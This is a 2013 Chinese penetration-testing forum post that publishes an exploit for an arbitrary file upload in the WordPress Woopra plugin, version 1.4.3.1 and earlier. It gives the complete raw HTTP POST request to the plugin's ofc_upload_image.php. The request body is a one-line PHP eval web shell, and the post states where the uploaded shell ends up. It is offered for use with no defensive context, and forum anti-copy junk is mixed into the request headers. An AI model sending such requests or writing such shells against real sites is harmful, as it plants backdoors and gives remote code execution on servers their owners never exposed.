中国网络渗透测试联盟

标题: WordPress Woopra插件任意文件上传+远程代码执行 [打印本页]

作者: admin    时间: 2013-10-13 13:06
标题: WordPress Woopra插件任意文件上传+远程代码执行
照例e文装逼

WordPress Woopra Remote Code Execution:http://www.wordpress-secure.org/ ... ote-code-execution/


% ]2 s& V. [8 r3 K' O4 d/ X

此漏洞对Woopra 1.4.3.1以上版本无效。

插件下载地址:

http://downloads.wordpress.org/plugin/woopra.1.4.3.1.zip


2 r* a. \5 P( }8 x. p5 p

exp发包:

POST /wordpress/3.5.1_CN/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name=11.php HTTP/1.1
, o7 J- E7 P9 P/ Q  E2 b& PHost: ha.cker.in
2 `) l/ N3 _% n4 vProxy-Connection: keep-alive
( M8 M' x# e) K# D2 o* R1 NCache-Control: max-age=0
5 D. J0 v- Q" X# T% I- R/ b+ m& tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
. Z8 F8 ]5 C4 S* I, W& tUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1478.0 Safari/537.36
/ q. {8 {) D* b$ [$ F$ f8 m2 UAccept-Encoding: gzip,deflate,sdch
/ k+ t' O1 C4 a- XAccept-Language: zh-CN,zh;q=0.8
! v6 p9 r. V9 K' IContent-Length: 28

<?php eval($_POST['cmd']); ?>


! Z- @2 T" E* ^5 @" |5 {) P" ~

上传的文件在http://ha.cker.in/wordpress/3.5. ... pload-images/11.php9 i7 M6 ~+ W1 c3 j# i5 e
[attach]267[/attach]






欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2